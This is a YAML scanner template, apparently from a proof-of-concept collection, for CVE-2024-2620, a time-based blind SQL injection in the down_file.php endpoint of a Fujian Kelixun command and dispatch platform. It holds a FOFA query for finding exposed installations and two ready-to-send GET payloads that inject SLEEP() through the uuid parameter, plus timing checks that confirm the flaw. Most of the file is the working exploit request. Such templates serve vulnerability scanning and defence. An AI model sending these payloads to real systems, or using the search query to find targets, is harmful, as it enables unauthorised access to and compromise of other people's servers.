product: 福建科立迅通信指挥调度平台
vName: 福建科立迅通信指挥调度平台 down_file.php SQL注入
type: SQL注入
vID:
  - CVE-2024-2620
level: 3
vDesc: 福建科立迅通信指挥调度平台down_file.php 接口处SQL注入漏洞，恶意攻击者可能利用该漏洞获取服务器敏感信息，最后造成服务器失陷。
version: ''
note: ''
search:
  FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
protocol: http
link: https://blog.csdn.net/qq_40550150/article/details/137012649
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /api/client/down_file.php?uuid=1' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))pwaA) AND 'dDhF'='dDhF
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: get
      follow: false
      path: /api/client/down_file.php?uuid=1' AND (SELECT 5587 FROM (SELECT(SLEEP(0)))pwaA) AND 'dDhF'='dDhF
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3
